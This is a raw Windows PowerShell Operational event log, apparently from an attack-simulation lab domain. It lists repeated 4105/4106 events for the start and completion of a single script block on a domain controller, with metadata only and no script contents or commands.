Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475660
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475659
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475658
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475657
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475656
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475655
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475654
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475653
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475652
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475651
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475650
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475649
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475648
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475647
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475646
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475645
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475644
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475643
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475642
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475641
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475640
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475639
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475638
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475637
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475636
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475635
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475634
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475633
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475632
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475631
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475630
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475629
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475628
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475627
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475626
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475625
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475624
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475623
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475622
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475621
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475620
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475619
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475618
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475617
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475616
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475615
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475614
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475613
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475612
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475611
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475610
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475609
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475608
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475607
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
